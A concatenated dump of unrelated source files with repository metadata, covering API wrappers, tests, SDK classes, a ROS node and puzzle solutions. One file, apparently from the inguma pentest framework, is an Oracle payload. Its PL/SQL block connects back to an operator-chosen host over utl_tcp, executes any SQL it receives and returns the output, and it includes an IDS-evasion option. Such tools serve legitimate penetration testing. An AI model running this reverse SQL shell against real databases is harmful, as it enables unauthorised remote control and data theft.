Create a new instance of the FindByKeyword Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
Choreography.__init__(self, temboo_session, '/Library/Flickr/Places/FindByKeyword')
def new_input_set(self):
return FindByKeywordInputSet()
def _make_result_set(self, result, path):
return FindByKeywordResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return FindByKeywordChoreographyExecution(session, exec_id, path)
class FindByKeywordInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the FindByKeyword
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_APIKey(self, value):
"""
Set the value of the APIKey input for this Choreo. ((required, string) The API Key provided by Flickr (AKA the OAuth Consumer Key).)
"""
InputSet._set_input(self, 'APIKey', value)
def set_Query(self, value):
"""
Set the value of the Query input for this Choreo. ((required, string) The query string to use for place ID lookups.)
"""
InputSet._set_input(self, 'Query', value)
def set_ResponseFormat(self, value):
"""
Set the value of the ResponseFormat input for this Choreo. ((optional, string) The format that the response should be in. Valid values are: xml and json. Defaults to json.)
"""
InputSet._set_input(self, 'ResponseFormat', value)
class FindByKeywordResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the FindByKeyword Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. (The response from Flickr.)
"""
return self._output.get('Response', None)
class FindByKeywordChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return FindByKeywordResultSet(response, path)
|
[
"[email protected]"
] | |
a3a07052f03a7dc28d6f2c41f80889cbc46bc905
|
32c6590127686114bfacff11fa7cd646025d3819
|
/test_project/test_app/models.py
|
e45ce8711f5854e739457ed3382e0356433d6b1c
|
[
"BSD-2-Clause"
] |
permissive
|
revsys/django-test-plus
|
42cc6cddde30f561bec91294d2e85c21cbc62887
|
9cfb0c865b1dcad1ca6c9c4717d67ea8d476269c
|
refs/heads/main
| 2023-08-29T03:52:59.089300 | 2023-07-11T11:37:47 | 2023-07-11T11:37:47 | 36,131,033 | 618 | 75 |
BSD-3-Clause
| 2023-07-11T11:35:24 | 2015-05-23T16:08:52 |
Python
|
UTF-8
|
Python
| false | false | 154 |
py
|
from django.db import models
class Data(models.Model):
""" Simple model to test our query assertions """
name = models.CharField(max_length=50)
|
[
"[email protected]"
] | |
053f64e6385d70d8e49c045ff44d38e56873a99a
|
d4a569dcf616b7f05e53a44803e38196b436b8b9
|
/[email protected]/Lib/site-packages/mypy/typeshed/third_party/2and3/dateutil/utils.pyi
|
3eefd2e48ba5311cbdb709991a6815cdd94459e1
|
[
"MIT"
] |
permissive
|
nverbois/TFE21-232
|
ac3178d24939c872c02a671c0f1d8cc471af516b
|
7113837b5263b5c508bfc6903cb6982b48aa7ee4
|
refs/heads/main
| 2023-06-05T18:50:59.207392 | 2021-06-25T19:54:40 | 2021-06-25T19:54:40 | 337,691,391 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 281 |
pyi
|
from typing import Optional
from datetime import datetime, tzinfo, timedelta
def default_tzinfo(dt: datetime, tzinfo: tzinfo) -> datetime: ...
def today(tzinfo: Optional[tzinfo] = ...) -> datetime: ...
def within_delta(dt1: datetime, dt2: datetime, delta: timedelta) -> bool: ...
|
[
"[email protected]"
] | |
8cae290d2e0f4814c027458fafbd56b76c6c8859
|
e99bc88c211c00a701514761fdfcb9b755e6de4e
|
/payloads/oracle/reverse_sql.py
|
c8a4d05996c833f8976901daa94da532f212e589
|
[] |
no_license
|
Wuodan/inguma
|
177f40f636d363f081096c42def27986f05e37e7
|
c82e7caf86e24ad9783a2748c4f1d9148ad3d0ee
|
refs/heads/master
| 2020-03-26T21:52:28.421738 | 2013-03-20T20:45:13 | 2018-08-20T12:19:30 | 145,413,992 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,506 |
py
|
#!/usr/bin/python
"""
NOTE: Should be rewritten from scratch!!!!
"""
import sys
sys.path.append("../../lib")
sys.path.append("../lib")
sys.path.append("lib")
import run_command
from oracleids import randomizeSpaces
data = """
DECLARE
data varchar2(32767);
v_ret varchar2(32767);
len number;
conn utl_tcp.connection;
BEGIN
conn := utl_tcp.open_connection(remote_host => '%HOST%', remote_port => %PORT%, charset => 'US7ASCII');
loop
data := utl_tcp.get_line(conn);
data := substr(data, 1, length(data)-1);
if lower(data) = 'exit' then
exit;
else
begin
if lower(data) like 'select%' then
execute immediate data into v_ret;
else
execute immediate data;
v_ret := 'Statement executed';
end if;
len := utl_tcp.write_line(conn, 'RET:' || v_ret);
exception
when others then
len := utl_tcp.write_line(conn, 'ERROR: ' || sqlcode || ' - ' || sqlerrm);
end;
end if;
dbms_output.put_line('"' || data || '"');
end loop;
utl_tcp.close_connection(conn);
END;
"""
name = "reverse_sql"
brief_description = "Run a blind reverse SQL terminal"
class CPayload:
user = "TEST"
function = "F1"
useDML = False
covert = 0
verifyCommand = ""
connection = None
type = 0
host = ""
port = ""
connection = None
def __init__(self):
pass
def run(self):
global data
tmp = data
tmp = tmp.replace("%USER%", self.user)
if self.host == "":
self.host = raw_input("Host to connect: ")
if self.port == "":
self.port = raw_input("Port to listen: ")
tmp = tmp.replace("%HOST%", self.host)
tmp = tmp.replace("%PORT%", self.port)
if self.covert > 0:
# Currently only one IDS evasion technique is used
tmp = randomizeSpaces(tmp)
objRun = run_command.CPayload()
objRun.idsTechniques = self.covert
objRun.user = self.user
objRun.command = tmp
ret = objRun.run()
return ret
def verify(self, connection):
sql = self.verifyCommand
cursor = connection.cursor()
cursor.execute(sql)
for x in cursor.fetchall():
return True
return False
def main():
import cx_Oracle
a = CPayload()
a.idsTechniques = 1
cmd = a.run()
print cmd
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
e55349cdae31ad6838c68bcf8a78353c4625794a
|
1e0355b293100873cedfcac789655a35180781db
|
/BOJ1541.py
|
80f1eee1110f147baa91c39f0bbea9e2989c2d24
|
[
"MIT"
] |
permissive
|
INYEONGKIM/BOJ
|
47dbf6aeb7a0f1b15208866badedcd161c00ee49
|
5e83d77a92d18b0d20d26645c7cfe4ba3e2d25bc
|
refs/heads/master
| 2021-06-14T13:50:04.124334 | 2021-03-09T14:04:14 | 2021-03-09T14:04:14 | 168,840,573 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 164 |
py
|
s=input().split("-")
if s[0]=="":
res=0
else:
res=sum(map(int,s[0].split("+")))
for i in range(1,len(s)):
res-=sum(map(int,s[i].split("+")))
print(res)
|
[
"[email protected]"
] | |
b4a2db0fc6da43c2eb0ad5f2cd65f2c360d65ad7
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/eDQDChGrv6y4fd44j_20.py
|
1a24d4d5555b5a19f0f2a0043b0899ec7134f363
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,156 |
py
|
"""
A billboard is an `m * n` list, where each list element consists of either one
letter or a blank space. You are given a phrase and the billboard dimensions.
Create a function that determines whether you can place the complete phrase on
the billboard.
There are two rules:
1. If there is a space between two words:
* If they are on the same row, you must put a space.
* If they are two different rows, the space is optional.
2. You can only put COMPLETE words on a row.
To illustrate, `can_put("GOOD MORN", [2, 4])` should yield `True`, since while
there is a space between "GOOD" and "MORN", it's not needed since both words
are on separate rows.
[
["G", "O", "O", "D"],
["M", "O", "R", "N"]
]
On the other hand `can_put("GOOD MORN", [1, 8])` should yield `False`. Since
both words reside in the first row, we require nine spots, and eight would
yield the incomplete phrase "GOOD MOR".
[
["G", "O", "O", "D", "_", "M", "O", "R"]
]
We would also return `False` if we could not fit a word on a row. So
`can_put("GOOD MORN", [3,3])` should yield `False`, since we can only fit
"GOO" on the first row.
[
["G", "O", "O"],
["D", "_", "M"],
["O", "R", "N"]
]
# No good!
### Examples
can_put("HEY JUDE", [2, 4]) ➞ True
can_put("HEY JUDE", [1, 8]) ➞ True
can_put("HEY JUDE", [1, 7]) ➞ False
can_put("HEY JUDE", [4, 3]) ➞ False
### Notes
It is okay to leave extra empty spaces on one line if you cannot fit two words
with a space. For example, in a 5 x 5 billboard, you can put "BE" on the first
row and "HAPPY" on the second row.
"""
def can_put(message, dimensions):
def fit_word(pointer, word):
height, width = dimensions
row, col = pointer
if width - col >= len(word): #fits in line
return (row, col + len(word) + 1)
elif row + 1 < height and len(word) <= width:
return (row + 1, len(word) + 1)
pointer = (0,0)
for word in message.split():
pointer = fit_word(pointer, word)
if not pointer:
return False
return True
|
[
"[email protected]"
] | |
4f4b68ca0c6623d671747618cbe6275ec180ab9f
|
b22cbe574c6fd43fde3dc82441805917b5996bb2
|
/test/util.py
|
9a84f69774201372124c9d12aad475c699637b11
|
[] |
no_license
|
matthagy/hlab
|
7a7b16526ee06f9b6211e387795e09c6438b536c
|
1bea77cf6df460f1828f99f3a54251d20e2d0f3d
|
refs/heads/master
| 2021-01-25T03:26:52.311278 | 2012-07-23T16:20:11 | 2012-07-23T16:20:11 | 2,352,334 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,332 |
py
|
'''Assorted unit tests utilities
'''
import unittest
from HH2.pathutils import FilePath,DirPath
def basepath():
filebase = FilePath(__file__).abspath().stripext()
backpath = __name__.replace('.','/')
assert filebase.endswith(backpath)
path = DirPath(filebase[:-len(backpath)])
assert path.isdir()
return path
basepath = basepath()
loader = unittest.TestLoader()
def load_file_tests(path):
path = path.stripext()
assert path.startswith(basepath)
name = path[len(basepath)+1::].replace('/','.')
mod = __import__(name, fromlist=name.rsplit('.',1)[-1:])
return loader.loadTestsFromModule(mod)
def load_directory_tests(path, recursive=True):
tests = []
for p in DirPath(path):
if p.isdir():
if recursive:
tests.extend(load_directory_tests(p, recursive=True))
elif (p.endswith('.py') and not p.basename().startswith('.') and
not p.statswith('__') and not p.basename() in ['util']):
tests.extend(load_file_tests(p))
return tests
def test_directory(basefile):
basefile = FilePath(basefile)
assert basefile.basename().startswith('__main__.py')
tests = unittest.TestSuite(load_directory_tests(basefile.abspath().parent()))
runner = unittest.TextTestRunner(verbosity=2)
runner.run(tests)
|
[
"[email protected]"
] | |
e91fb3b0579a68d2e180e42add34ad6919708d82
|
3929d114c1bc6aef86402300a8d5b278849d41ae
|
/186. Reverse Words in a String II.py
|
8cc8dc1f28c024f2e87d00719eb97c60a509c32c
|
[] |
no_license
|
lxyshuai/leetcode
|
ee622235266017cf18da9b484f87c1cf9ceb91d0
|
5f98270fbcd2d28d0f2abd344c3348255a12882a
|
refs/heads/master
| 2020-04-05T21:29:37.140525 | 2018-12-16T13:17:15 | 2018-12-16T13:17:15 | 157,222,620 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,135 |
py
|
"""
Given an input string, reverse the string word by word. A word is defined as a sequence of non-space characters.
The input string does not contain leading or trailing spaces and the words are always separated by a single space.
For example,
Given s = "the sky is blue",
return "blue is sky the".
Could you do it in-place without allocating extra space?
"""
class Solution(object):
def reverseWords(self, s):
"""
:type s: str
:rtype: str
"""
def reverse(string_list, left, right):
while left < right:
string_list[left], string_list[right] = string_list[right], string_list[left]
left += 1
right -= 1
string_list = list(s)
reverse(string_list, 0, len(string_list) - 1)
left = 0
right = 0
while right < len(string_list):
if string_list[right].isspace():
reverse(string_list, left, right - 1)
left = right + 1
right += 1
return ''.join(string_list)
if __name__ == '__main__':
print Solution().reverseWords('a b c d')
|
[
"[email protected]"
] | |
9dfef73bdb4ca36d08e448d5637ff33d58b50b88
|
325fde42058b2b82f8a4020048ff910cfdf737d7
|
/src/aks-preview/azext_aks_preview/vendored_sdks/azure_mgmt_preview_aks/v2019_02_01/models/managed_cluster_addon_profile_py3.py
|
71e05cd14c0e9e64885cfee910165304b5df4421
|
[
"LicenseRef-scancode-generic-cla",
"MIT"
] |
permissive
|
ebencarek/azure-cli-extensions
|
46b0d18fe536fe5884b00d7ffa30f54c7d6887d1
|
42491b284e38f8853712a5af01836f83b04a1aa8
|
refs/heads/master
| 2023-04-12T00:28:44.828652 | 2021-03-30T22:34:13 | 2021-03-30T22:34:13 | 261,621,934 | 2 | 5 |
MIT
| 2020-10-09T18:21:52 | 2020-05-06T01:25:58 |
Python
|
UTF-8
|
Python
| false | false | 1,290 |
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ManagedClusterAddonProfile(Model):
"""A Kubernetes add-on profile for a managed cluster.
All required parameters must be populated in order to send to Azure.
:param enabled: Required. Whether the add-on is enabled or not.
:type enabled: bool
:param config: Key-value pairs for configuring an add-on.
:type config: dict[str, str]
"""
_validation = {
'enabled': {'required': True},
}
_attribute_map = {
'enabled': {'key': 'enabled', 'type': 'bool'},
'config': {'key': 'config', 'type': '{str}'},
}
def __init__(self, *, enabled: bool, config=None, **kwargs) -> None:
super(ManagedClusterAddonProfile, self).__init__(**kwargs)
self.enabled = enabled
self.config = config
|
[
"[email protected]"
] | |
419db0786d502a3cf9c1eae20144f684848c9409
|
13a32b92b1ba8ffb07e810dcc8ccdf1b8b1671ab
|
/home--tommy--mypy/mypy/lib/python2.7/site-packages/gensim/test/test_utils.py
|
240900129cf6621eddafef08f2c921360b47d10e
|
[
"Unlicense"
] |
permissive
|
tommybutler/mlearnpy2
|
8ec52bcd03208c9771d8d02ede8eaa91a95bda30
|
9e5d377d0242ac5eb1e82a357e6701095a8ca1ff
|
refs/heads/master
| 2022-10-24T23:30:18.705329 | 2022-10-17T15:41:37 | 2022-10-17T15:41:37 | 118,529,175 | 0 | 2 |
Unlicense
| 2022-10-15T23:32:18 | 2018-01-22T23:27:10 |
Python
|
UTF-8
|
Python
| false | false | 6,864 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
Automated tests for checking various utils functions.
"""
import logging
import unittest
import numpy as np
from six import iteritems
from gensim import utils
class TestIsCorpus(unittest.TestCase):
def test_None(self):
# test None
result = utils.is_corpus(None)
expected = (False, None)
self.assertEqual(expected, result)
def test_simple_lists_of_tuples(self):
# test list words
# one document, one word
potentialCorpus = [[(0, 4.)]]
result = utils.is_corpus(potentialCorpus)
expected = (True, potentialCorpus)
self.assertEqual(expected, result)
# one document, several words
potentialCorpus = [[(0, 4.), (1, 2.)]]
result = utils.is_corpus(potentialCorpus)
expected = (True, potentialCorpus)
self.assertEqual(expected, result)
potentialCorpus = [[(0, 4.), (1, 2.), (2, 5.), (3, 8.)]]
result = utils.is_corpus(potentialCorpus)
expected = (True, potentialCorpus)
self.assertEqual(expected, result)
# several documents, one word
potentialCorpus = [[(0, 4.)], [(1, 2.)]]
result = utils.is_corpus(potentialCorpus)
expected = (True, potentialCorpus)
self.assertEqual(expected, result)
potentialCorpus = [[(0, 4.)], [(1, 2.)], [(2, 5.)], [(3, 8.)]]
result = utils.is_corpus(potentialCorpus)
expected = (True, potentialCorpus)
self.assertEqual(expected, result)
def test_int_tuples(self):
potentialCorpus = [[(0, 4)]]
result = utils.is_corpus(potentialCorpus)
expected = (True, potentialCorpus)
self.assertEqual(expected, result)
def test_invalid_formats(self):
# test invalid formats
# these are no corpus, because they do not consists of 2-tuples with
# the form(int, float).
potentials = list()
potentials.append(["human"])
potentials.append("human")
potentials.append(["human", "star"])
potentials.append([1, 2, 3, 4, 5, 5])
potentials.append([[(0, 'string')]])
for noCorpus in potentials:
result = utils.is_corpus(noCorpus)
expected = (False, noCorpus)
self.assertEqual(expected, result)
class TestUtils(unittest.TestCase):
def test_decode_entities(self):
# create a string that fails to decode with unichr on narrow python builds
body = u'It’s the Year of the Horse. YES VIN DIESEL 🙌 💯'
expected = u'It\x92s the Year of the Horse. YES VIN DIESEL \U0001f64c \U0001f4af'
self.assertEqual(utils.decode_htmlentities(body), expected)
class TestSampleDict(unittest.TestCase):
def test_sample_dict(self):
d = {1: 2, 2: 3, 3: 4, 4: 5}
expected_dict = [(1, 2), (2, 3)]
expected_dict_random = [(k, v) for k, v in iteritems(d)]
sampled_dict = utils.sample_dict(d, 2, False)
self.assertEqual(sampled_dict, expected_dict)
sampled_dict_random = utils.sample_dict(d, 2)
if sampled_dict_random in expected_dict_random:
self.assertTrue(True)
class TestWindowing(unittest.TestCase):
arr10_5 = np.array([
[0, 1, 2, 3, 4],
[1, 2, 3, 4, 5],
[2, 3, 4, 5, 6],
[3, 4, 5, 6, 7],
[4, 5, 6, 7, 8],
[5, 6, 7, 8, 9]
])
def _assert_arrays_equal(self, expected, actual):
self.assertEqual(expected.shape, actual.shape)
self.assertTrue((actual == expected).all())
def test_strided_windows1(self):
out = utils.strided_windows(range(5), 2)
expected = np.array([
[0, 1],
[1, 2],
[2, 3],
[3, 4]
])
self._assert_arrays_equal(expected, out)
def test_strided_windows2(self):
input_arr = np.arange(10)
out = utils.strided_windows(input_arr, 5)
expected = self.arr10_5.copy()
self._assert_arrays_equal(expected, out)
out[0, 0] = 10
self.assertEqual(10, input_arr[0], "should make view rather than copy")
def test_strided_windows_window_size_exceeds_size(self):
input_arr = np.array(['this', 'is', 'test'], dtype='object')
out = utils.strided_windows(input_arr, 4)
expected = np.ndarray((0, 0))
self._assert_arrays_equal(expected, out)
def test_strided_windows_window_size_equals_size(self):
input_arr = np.array(['this', 'is', 'test'], dtype='object')
out = utils.strided_windows(input_arr, 3)
expected = np.array([input_arr.copy()])
self._assert_arrays_equal(expected, out)
def test_iter_windows_include_below_window_size(self):
texts = [['this', 'is', 'a'], ['test', 'document']]
out = utils.iter_windows(texts, 3, ignore_below_size=False)
windows = [list(w) for w in out]
self.assertEqual(texts, windows)
out = utils.iter_windows(texts, 3)
windows = [list(w) for w in out]
self.assertEqual([texts[0]], windows)
def test_iter_windows_list_texts(self):
texts = [['this', 'is', 'a'], ['test', 'document']]
windows = list(utils.iter_windows(texts, 2))
list_windows = [list(iterable) for iterable in windows]
expected = [['this', 'is'], ['is', 'a'], ['test', 'document']]
self.assertListEqual(list_windows, expected)
def test_iter_windows_uses_views(self):
texts = [np.array(['this', 'is', 'a'], dtype='object'), ['test', 'document']]
windows = list(utils.iter_windows(texts, 2))
list_windows = [list(iterable) for iterable in windows]
expected = [['this', 'is'], ['is', 'a'], ['test', 'document']]
self.assertListEqual(list_windows, expected)
windows[0][0] = 'modified'
self.assertEqual('modified', texts[0][0])
def test_iter_windows_with_copy(self):
texts = [
np.array(['this', 'is', 'a'], dtype='object'),
np.array(['test', 'document'], dtype='object')
]
windows = list(utils.iter_windows(texts, 2, copy=True))
windows[0][0] = 'modified'
self.assertEqual('this', texts[0][0])
windows[2][0] = 'modified'
self.assertEqual('test', texts[1][0])
def test_flatten_nested(self):
nested_list = [[[1, 2, 3], [4, 5]], 6]
expected = [1, 2, 3, 4, 5, 6]
self.assertEqual(utils.flatten(nested_list), expected)
def test_flatten_not_nested(self):
not_nested = [1, 2, 3, 4, 5, 6]
expected = [1, 2, 3, 4, 5, 6]
self.assertEqual(utils.flatten(not_nested), expected)
if __name__ == '__main__':
logging.root.setLevel(logging.WARNING)
unittest.main()
|
[
"[email protected]"
] | |
547f56cae470648424b7485f6231f2167b17b872
|
9405aa570ede31a9b11ce07c0da69a2c73ab0570
|
/aliyun-python-sdk-hbase/aliyunsdkhbase/request/v20190101/CreateInstanceRequest.py
|
6dcc7d5ca183ba80569cfe098efcfdd438b27383
|
[
"Apache-2.0"
] |
permissive
|
liumihust/aliyun-openapi-python-sdk
|
7fa3f5b7ea5177a9dbffc99e73cf9f00e640b72b
|
c7b5dd4befae4b9c59181654289f9272531207ef
|
refs/heads/master
| 2020-09-25T12:10:14.245354 | 2019-12-04T14:43:27 | 2019-12-04T14:43:27 | 226,002,339 | 1 | 0 |
NOASSERTION
| 2019-12-05T02:50:35 | 2019-12-05T02:50:34 | null |
UTF-8
|
Python
| false | false | 6,117 |
py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkhbase.endpoint import endpoint_data
class CreateInstanceRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'HBase', '2019-01-01', 'CreateInstance','hbase')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_ClusterName(self):
return self.get_query_params().get('ClusterName')
def set_ClusterName(self,ClusterName):
self.add_query_param('ClusterName',ClusterName)
def get_DbInstanceConnType(self):
return self.get_query_params().get('DbInstanceConnType')
def set_DbInstanceConnType(self,DbInstanceConnType):
self.add_query_param('DbInstanceConnType',DbInstanceConnType)
def get_EngineVersion(self):
return self.get_query_params().get('EngineVersion')
def set_EngineVersion(self,EngineVersion):
self.add_query_param('EngineVersion',EngineVersion)
def get_DepMode(self):
return self.get_query_params().get('DepMode')
def set_DepMode(self,DepMode):
self.add_query_param('DepMode',DepMode)
def get_BackupId(self):
return self.get_query_params().get('BackupId')
def set_BackupId(self,BackupId):
self.add_query_param('BackupId',BackupId)
def get_DbInstanceType(self):
return self.get_query_params().get('DbInstanceType')
def set_DbInstanceType(self,DbInstanceType):
self.add_query_param('DbInstanceType',DbInstanceType)
def get_VSwitchId(self):
return self.get_query_params().get('VSwitchId')
def set_VSwitchId(self,VSwitchId):
self.add_query_param('VSwitchId',VSwitchId)
def get_SecurityIPList(self):
return self.get_query_params().get('SecurityIPList')
def set_SecurityIPList(self,SecurityIPList):
self.add_query_param('SecurityIPList',SecurityIPList)
def get_AutoRenew(self):
return self.get_query_params().get('AutoRenew')
def set_AutoRenew(self,AutoRenew):
self.add_query_param('AutoRenew',AutoRenew)
def get_NetType(self):
return self.get_query_params().get('NetType')
def set_NetType(self,NetType):
self.add_query_param('NetType',NetType)
def get_ZoneId(self):
return self.get_query_params().get('ZoneId')
def set_ZoneId(self,ZoneId):
self.add_query_param('ZoneId',ZoneId)
def get_CoreDiskType(self):
return self.get_query_params().get('CoreDiskType')
def set_CoreDiskType(self,CoreDiskType):
self.add_query_param('CoreDiskType',CoreDiskType)
def get_PricingCycle(self):
return self.get_query_params().get('PricingCycle')
def set_PricingCycle(self,PricingCycle):
self.add_query_param('PricingCycle',PricingCycle)
def get_CoreInstanceQuantity(self):
return self.get_query_params().get('CoreInstanceQuantity')
def set_CoreInstanceQuantity(self,CoreInstanceQuantity):
self.add_query_param('CoreInstanceQuantity',CoreInstanceQuantity)
def get_Duration(self):
return self.get_query_params().get('Duration')
def set_Duration(self,Duration):
self.add_query_param('Duration',Duration)
def get_Engine(self):
return self.get_query_params().get('Engine')
def set_Engine(self,Engine):
self.add_query_param('Engine',Engine)
def get_RestoreTime(self):
return self.get_query_params().get('RestoreTime')
def set_RestoreTime(self,RestoreTime):
self.add_query_param('RestoreTime',RestoreTime)
def get_SrcDBInstanceId(self):
return self.get_query_params().get('SrcDBInstanceId')
def set_SrcDBInstanceId(self,SrcDBInstanceId):
self.add_query_param('SrcDBInstanceId',SrcDBInstanceId)
def get_MasterInstanceType(self):
return self.get_query_params().get('MasterInstanceType')
def set_MasterInstanceType(self,MasterInstanceType):
self.add_query_param('MasterInstanceType',MasterInstanceType)
def get_ColdStorageSize(self):
return self.get_query_params().get('ColdStorageSize')
def set_ColdStorageSize(self,ColdStorageSize):
self.add_query_param('ColdStorageSize',ColdStorageSize)
def get_CoreDiskQuantity(self):
return self.get_query_params().get('CoreDiskQuantity')
def set_CoreDiskQuantity(self,CoreDiskQuantity):
self.add_query_param('CoreDiskQuantity',CoreDiskQuantity)
def get_IsColdStorage(self):
return self.get_query_params().get('IsColdStorage')
def set_IsColdStorage(self,IsColdStorage):
self.add_query_param('IsColdStorage',IsColdStorage)
def get_CoreInstanceType(self):
return self.get_query_params().get('CoreInstanceType')
def set_CoreInstanceType(self,CoreInstanceType):
self.add_query_param('CoreInstanceType',CoreInstanceType)
def get_CoreDiskSize(self):
return self.get_query_params().get('CoreDiskSize')
def set_CoreDiskSize(self,CoreDiskSize):
self.add_query_param('CoreDiskSize',CoreDiskSize)
def get_VpcId(self):
return self.get_query_params().get('VpcId')
def set_VpcId(self,VpcId):
self.add_query_param('VpcId',VpcId)
def get_DbType(self):
return self.get_query_params().get('DbType')
def set_DbType(self,DbType):
self.add_query_param('DbType',DbType)
def get_PayType(self):
return self.get_query_params().get('PayType')
def set_PayType(self,PayType):
self.add_query_param('PayType',PayType)
|
[
"[email protected]"
] | |
afd5e9a732ae36b23155af1e2cba98c435520645
|
dde6faa0857c8c7e46cbe3c48dbe80b1ac9c9bcf
|
/suspend_resume/scripts/suspend_resume_handler_3.py
|
18f59181cb17badae55a3e34d125fbf2cc356724
|
[] |
no_license
|
ROSDevoloper/Atlas80EVO-Gazebo
|
7119270f4421b1a077e3c4abbb90dcf11281023b
|
468d068584e71c3cca2169b365ec43faaac33f47
|
refs/heads/master
| 2022-10-16T10:02:48.121404 | 2020-06-15T05:08:46 | 2020-06-15T05:08:46 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,185 |
py
|
#!/usr/bin/env python
"""
Author: (1) Arefeen Ridwan
(2) Samuel Chieng Kien Ho
Function: Suspend Resume based on service request
"""
import rospy
from atlas80evo_msgs.msg import FSMState
from atlas80evo_msgs.srv import SetFSMState
from std_srvs.srv import Empty
from geometry_msgs.msg import Twist
from std_msgs.msg import String
class SuspendResumeHandler():
def __init__(self):
# Internal USE Variables - Modify with consultation
self.rate = rospy.Rate(30)
self.sleep = rospy.Rate(2)
self.pre_state="NONE"
self.current_state="NONE"
# Publisher
self.drive_pub = rospy.Publisher(rospy.get_param("~drive_topic", "/twist_cmd_mux/input/suspend"), Twist, queue_size=1)
# Subscriber
self.state_sub= rospy.Subscriber("/fsm_node/state", FSMState, self.stateCB, queue_size=1) #get current state from ros
# Service Server
self.suspend_srv = rospy.Service("/suspend/request", Empty, self.suspendSRV)
# Service Client
self.set_state_call = rospy.ServiceProxy("/fsm_node/set_state", SetFSMState)
# Main Loop
self.main_loop()
# FSM State Callback
def stateCB(self, msg):
self.current_state = msg.state
if str(msg.state)!="SUSPEND" and str(msg.state)!="ERROR" and str(msg.state)!="MANUAL":
self.pre_state=str(msg.state)
def suspendSRV(self, req):
self.sleep.sleep()
if self.current_state!="SUSPEND":
self.set_state_call("SUSPEND")
self.stopping()
#print("suspend")
else:
self.set_state_call(self.pre_state)
print self.pre_state
self.sleep.sleep()
return ()
# Main Loop
def main_loop(self):
while not rospy.is_shutdown():
if(self.current_state=="SUSPEND"):
self.stopping()
#print("suspend")
self.rate.sleep()
# Stopping Vehicle
def stopping(self):
stop_cmd=Twist()
self.drive_pub.publish(stop_cmd)
if __name__=="__main__":
rospy.init_node("suspend_resume_handler")
SuspendResumeHandler()
rospy.spin()
|
[
"[email protected]"
] | |
f64feda20504dccac97a40d5747a0a3c49125432
|
d05298a88638fd62f74e8f26c5a1959f821367d1
|
/src/words_baseline/reddit_output_att.py
|
413266f01e93721f50de7639a7e50fc75bac1c43
|
[
"MIT"
] |
permissive
|
rpryzant/causal-text-embeddings
|
d4b93f5852f1854d52a09e28b81ee784015e296a
|
2966493f86a6f808f0dfa71d590e3403a840befc
|
refs/heads/master
| 2022-12-22T09:33:23.654291 | 2020-03-05T19:41:33 | 2020-03-05T19:41:33 | 298,045,006 | 1 | 0 |
MIT
| 2020-09-23T17:28:18 | 2020-09-23T17:28:18 | null |
UTF-8
|
Python
| false | false | 4,087 |
py
|
from semi_parametric_estimation.att import att_estimates, psi_plugin, psi_q_only
from reddit.data_cleaning.reddit_posts import load_reddit_processed
from .helpers import filter_document_embeddings, make_index_mapping, assign_split
import numpy as np
import pandas as pd
import os
from sklearn.linear_model import LogisticRegression, LinearRegression, Ridge
from sklearn.metrics import mean_squared_error as mse
import argparse
import sys
from scipy.special import logit
from scipy.sparse import load_npz
def get_log_outcomes(outcomes):
#relu
outcomes = np.array([max(0.0, out) + 1.0 for out in outcomes])
return np.log(outcomes)
def predict_expected_outcomes(model, features):
return model.predict(features)
def fit_conditional_expected_outcomes(outcomes, features):
model = Ridge()
model.fit(features, outcomes)
predict = model.predict(features)
if verbose:
print("Training MSE:", mse(outcomes, predict))
return model
def predict_treatment_probability(labels, features):
model = LogisticRegression(solver='liblinear')
model.fit(features, labels)
if verbose:
print("Training accuracy:", model.score(features, labels))
treatment_probability = model.predict_proba(features)[:,1]
return treatment_probability
def load_simulated_data():
sim_df = pd.read_csv(simulation_file, delimiter='\t')
sim_df = sim_df.rename(columns={'index':'post_index'})
return sim_df
def load_term_counts(path='../dat/reddit/'):
return load_npz(path + 'term_counts.npz').toarray()
def main():
if not dat_dir:
term_counts = load_term_counts()
else:
term_counts = load_term_counts(path=dat_dir)
